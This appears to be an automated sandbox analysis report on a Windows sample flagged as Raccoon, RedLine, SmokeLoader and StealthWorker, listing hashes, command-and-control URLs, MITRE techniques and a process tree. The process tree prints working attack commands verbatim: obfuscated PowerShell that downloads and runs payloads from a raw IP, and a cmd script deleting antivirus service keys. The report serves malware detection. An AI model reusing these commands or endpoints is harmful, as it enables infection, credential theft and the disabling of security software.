raccoon | f24a559e79ba3121c7e0fed4ac995da056fe6a0dac71b2360f9e340b97117d05

Resubmissions

26-08-2021 21:12

210826-flswvxb8js 10

13-08-2021 07:22

210813-9241gpvrbs 10

Analysis

max time kernel
151s
max time network
147s
platform
windows10_x64
resource
win10v20210408
submitted
13-08-2021 07:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06a029882deabf229f62728afe3baf4f.exe
Size

319KB
MD5

06a029882deabf229f62728afe3baf4f
SHA1

33a5953fbcce8761af1e68df9c9f4ad153c4a536
SHA256

f24a559e79ba3121c7e0fed4ac995da056fe6a0dac71b2360f9e340b97117d05
SHA512

a81631eef6163f437e5bdf83156d26856653411dc6b9becc5580a83b9a4123faec5855d625beec15b1f71c3155624187f776f56b4f58e5f87e9f39bd8b61ba88

Score

10^/10

raccoon redline smokeloader stealthworker 471c70de3b4f9e4d493e418d1f60a90659057de0 cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor botnet discovery evasion infostealer persistence spyware stealer suricata themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1488-194-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/1488-195-0x000000000044003F-mapping.dmp	family_raccoon
behavioral2/memory/1488-212-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/2224-222-0x0000000000400000-0x0000000002CA9000-memory.dmp	family_raccoon
behavioral2/memory/2224-226-0x0000000004830000-0x00000000048C1000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
StealthWorker
StealthWorker is golang-based brute force malware.
botnet stealthworker

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description	pid	Process	procid_target
PID 3600 created 2224	3600	WerFault.exe	106

suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow	pid	Process
205	3860	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

Processes:

42F5.exe4577.exe470E.exe4E53.exeRuntimebroker.exe470E.exeA5F9.exewgsbiwiwgsbiwi

pid	Process
688	42F5.exe
1332	4577.exe
2684	470E.exe
3880	4E53.exe
856	Runtimebroker.exe
1488	470E.exe
2224	A5F9.exe
204	wgsbiwi
3548	wgsbiwi

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4E53.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4E53.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4E53.exe

Deletes itself 1 IoCs

Processes:

pid	Process
2428

Drops startup file 3 IoCs

Processes:

cmd.exeRuntimebroker.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

Loads dropped DLL 1 IoCs

Processes:

470E.exe

pid	Process
1488	470E.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/files/0x000200000001ab52-133.dat	themida
behavioral2/files/0x000200000001ab52-134.dat	themida
behavioral2/memory/3880-137-0x0000000001280000-0x0000000001281000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

4E53.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4E53.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

4E53.exe

pid	Process
3880	4E53.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

06a029882deabf229f62728afe3baf4f.exe470E.exewgsbiwi

description	pid	Process	procid_target
PID 648 set thread context of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 2684 set thread context of 1488	2684	470E.exe	103
PID 204 set thread context of 3548	204	wgsbiwi	127

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
3616	688	WerFault.exe	79
3748	688	WerFault.exe	79
2156	688	WerFault.exe	79
4052	688	WerFault.exe	79
3240	688	WerFault.exe	79
1216	688	WerFault.exe	79
1144	856	WerFault.exe	91
3376	856	WerFault.exe	91
412	856	WerFault.exe	91
1944	856	WerFault.exe	91
1184	856	WerFault.exe	91
1328	856	WerFault.exe	91
4028	2224	WerFault.exe	106
4064	1488	WerFault.exe	103
3888	2224	WerFault.exe	106
1524	2224	WerFault.exe	106
1416	2224	WerFault.exe	106
3600	2224	WerFault.exe	106

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

06a029882deabf229f62728afe3baf4f.exewgsbiwi

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	06a029882deabf229f62728afe3baf4f.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	06a029882deabf229f62728afe3baf4f.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	06a029882deabf229f62728afe3baf4f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wgsbiwi
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wgsbiwi
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wgsbiwi

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

06a029882deabf229f62728afe3baf4f.exe

pid	Process
3584	06a029882deabf229f62728afe3baf4f.exe
3584	06a029882deabf229f62728afe3baf4f.exe
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid	Process
2428

Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

06a029882deabf229f62728afe3baf4f.exe

pid	Process
3584	06a029882deabf229f62728afe3baf4f.exe
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428

Suspicious use of AdjustPrivilegeToken 59 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe4E53.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exe470E.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exe

description	pid	Process
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeRestorePrivilege	3616	WerFault.exe
Token: SeBackupPrivilege	3616	WerFault.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeDebugPrivilege	3616	WerFault.exe
Token: SeDebugPrivilege	3748	WerFault.exe
Token: SeDebugPrivilege	2156	WerFault.exe
Token: SeDebugPrivilege	4052	WerFault.exe
Token: SeDebugPrivilege	3240	WerFault.exe
Token: SeDebugPrivilege	3880	4E53.exe
Token: SeDebugPrivilege	1216	WerFault.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeDebugPrivilege	1144	WerFault.exe
Token: SeDebugPrivilege	3376	WerFault.exe
Token: SeDebugPrivilege	412	WerFault.exe
Token: SeDebugPrivilege	1944	WerFault.exe
Token: SeDebugPrivilege	1184	WerFault.exe
Token: SeDebugPrivilege	1328	WerFault.exe
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	2684	470E.exe
Token: SeDebugPrivilege	3860	powershell.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeDebugPrivilege	4028	WerFault.exe
Token: SeDebugPrivilege	4064	WerFault.exe
Token: SeDebugPrivilege	3888	WerFault.exe
Token: SeDebugPrivilege	1524	WerFault.exe
Token: SeDebugPrivilege	1416	WerFault.exe
Token: SeDebugPrivilege	3600	WerFault.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid	Process
2428

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

06a029882deabf229f62728afe3baf4f.exe42F5.exe4577.exeRuntimebroker.exe470E.exepowershell.exe

description	pid	Process	procid_target
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 648 wrote to memory of 3584	648	06a029882deabf229f62728afe3baf4f.exe	75
PID 2428 wrote to memory of 688	2428		79
PID 2428 wrote to memory of 688	2428		79
PID 2428 wrote to memory of 688	2428		79
PID 2428 wrote to memory of 1332	2428		80
PID 2428 wrote to memory of 1332	2428		80
PID 2428 wrote to memory of 1332	2428		80
PID 2428 wrote to memory of 2684	2428		81
PID 2428 wrote to memory of 2684	2428		81
PID 2428 wrote to memory of 2684	2428		81
PID 2428 wrote to memory of 3880	2428		84
PID 2428 wrote to memory of 3880	2428		84
PID 2428 wrote to memory of 3880	2428		84
PID 688 wrote to memory of 856	688	42F5.exe	91
PID 688 wrote to memory of 856	688	42F5.exe	91
PID 688 wrote to memory of 856	688	42F5.exe	91
PID 1332 wrote to memory of 1788	1332	4577.exe	92
PID 1332 wrote to memory of 1788	1332	4577.exe	92
PID 1332 wrote to memory of 1788	1332	4577.exe	92
PID 856 wrote to memory of 3728	856	Runtimebroker.exe	100
PID 856 wrote to memory of 3728	856	Runtimebroker.exe	100
PID 856 wrote to memory of 3728	856	Runtimebroker.exe	100
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 856 wrote to memory of 3860	856	Runtimebroker.exe	104
PID 856 wrote to memory of 3860	856	Runtimebroker.exe	104
PID 856 wrote to memory of 3860	856	Runtimebroker.exe	104
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2684 wrote to memory of 1488	2684	470E.exe	103
PID 2428 wrote to memory of 2224	2428		106
PID 2428 wrote to memory of 2224	2428		106
PID 2428 wrote to memory of 2224	2428		106
PID 2428 wrote to memory of 3240	2428		107
PID 2428 wrote to memory of 3240	2428		107
PID 2428 wrote to memory of 3240	2428		107
PID 2428 wrote to memory of 3240	2428		107
PID 2428 wrote to memory of 3812	2428		108
PID 2428 wrote to memory of 3812	2428		108
PID 2428 wrote to memory of 3812	2428		108
PID 2428 wrote to memory of 2120	2428		112
PID 2428 wrote to memory of 2120	2428		112
PID 2428 wrote to memory of 2120	2428		112
PID 2428 wrote to memory of 2120	2428		112
PID 2428 wrote to memory of 3896	2428		116
PID 2428 wrote to memory of 3896	2428		116
PID 2428 wrote to memory of 3896	2428		116
PID 3860 wrote to memory of 2080	3860	powershell.exe	117
PID 3860 wrote to memory of 2080	3860	powershell.exe	117
PID 3860 wrote to memory of 2080	3860	powershell.exe	117
PID 2428 wrote to memory of 4068	2428		119
PID 2428 wrote to memory of 4068	2428		119
PID 2428 wrote to memory of 4068	2428		119
PID 2428 wrote to memory of 4068	2428		119
PID 2428 wrote to memory of 2372	2428		120

C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe
"C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:648
- C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe
  "C:\Users\Admin\AppData\Local\Temp\06a029882deabf229f62728afe3baf4f.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3584

C:\Users\Admin\AppData\Local\Temp\42F5.exe
C:\Users\Admin\AppData\Local\Temp\42F5.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:688
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 788
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:3616
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 804
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:3748
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 788
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 916
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:4052
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 804
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:3240
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 976
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:1216
- C:\ProgramData\Runtimebroker.exe
  "C:\ProgramData\Runtimebroker.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:856
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 736
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:1144
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 788
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 760
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:412
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 780
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 996
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 1028
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:1328
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
    3⤵
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:3728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3860
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2080
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 